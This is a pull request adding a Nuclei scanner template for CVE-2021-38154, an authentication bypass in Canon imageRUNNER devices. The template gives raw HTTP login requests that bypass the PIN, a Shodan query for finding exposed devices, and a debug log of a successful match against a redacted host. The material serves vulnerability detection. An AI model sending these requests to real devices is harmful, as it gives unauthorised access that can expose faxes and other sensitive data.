### PR TITLE
Add CVE-2021-38154 (vKEV)

### DIFF
--- a/http/cves/2021/CVE-2021-38154.yaml
+++ b/http/cves/2021/CVE-2021-38154.yaml
@@ -1,0 +1,61 @@
+id: CVE-2021-38154
+
+info:
+  name: Canon Devices - Authentication Bypass in Catwalk Server
+  author: daffainfo
+  severity: high
+  description: |
+    Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.
+  reference:
+    - https://protocolpolice.nl/CVE-2021-38154_Protocol_Police_Catwalk_Alert
+    - https://www.usa.canon.com/internet/portal/us/home/support/product-advisories
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-38154
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-38154
+    cwe-id: CWE-732
+    epss-score: 0.00699
+    epss-percentile: 0.70958
+    cpe: cpe:2.3:h:canon:-:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: canon
+    shodan-query: title:"imageRUNNER"
+  tags: cve,cve2021,canon,auth-bypass,vkev
+
+flow: http(1) || http(2)
+
+http:
+  - raw:
+      - |
+        POST /tryLogin.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        loginM=&0000=0011&0002=
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 303'
+          - 'contains(location, "/portal_top.html")'
+          - 'contains(set_cookie, "fusion-http-session-id=")'
+        condition: and
+
+  - raw:
+      - |
+        POST /checkLogin.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        i0017=2&i0019=
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 302'
+          - 'contains(location, "/portal_top.html")'
+          - 'contains(set_cookie, "sessid=")'
+        condition: and


### PR DESCRIPTION
### Template / PR Information

Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Debug

```

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2021-38154] Dumped HTTP request for http://REDACTED/tryLogin.cgi

POST /tryLogin.cgi HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Connection: close
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

loginM=&0000=0011&0002=
[DBG] [CVE-2021-38154] Dumped HTTP response http://REDACTED/tryLogin.cgi

HTTP/1.1 303 See Other
Content-Length: 92
Content-Type: text/html
Content-Type: text/html
Location: http://REDACTED/portal_top.html
Set-Cookie: fusion-http-session-id=YPQJCVKPMJQBOXCTQHIT;Comment=;Version=;HttpOnly

<html><body><p>You should be redirected to the new location automatically.</p></body></html>
[CVE-2021-38154:dsl-1] [http] [high] http://REDACTED/tryLogin.cgi
[INF] Scan completed in 683.711834ms. 1 matches found.
```